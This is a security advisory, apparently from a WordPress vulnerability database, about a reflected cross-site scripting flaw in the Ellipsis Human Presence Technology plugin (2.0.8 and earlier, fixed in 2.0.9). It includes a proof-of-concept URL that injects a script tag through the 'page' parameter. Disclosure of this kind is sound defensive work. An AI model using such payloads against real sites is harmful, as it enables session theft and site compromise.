Ellipsis Human Presence Technology <= 2.0.8 - Unauthenticated Reflected Cross Site Scripting (XSS)



Description
The 'page' GET parameter of the inc/protected-forms-table.php file was affected by a reflected XSS vulnerability.
Proof of Concept
http://www.example.com/wp-content/plugins/ellipsis-human-presence-technology/inc/protected-forms-table.php?&page="%20><script>alert("XSS")</script>

Affects Plugin

fixed in version 2.0.9

References

PacketStorm 154393
URL https://plugins.trac.wordpress.org/changeset/2155131/ellipsis-human-presence-technology

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Ricardo Sanchez
Views 5355
Verified No
WPVDB ID 9875

Timeline

Publicly Published 2019-09-07 (10 months ago)
Added 2019-09-10 (10 months ago)
Last Updated 2020-02-13 (5 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin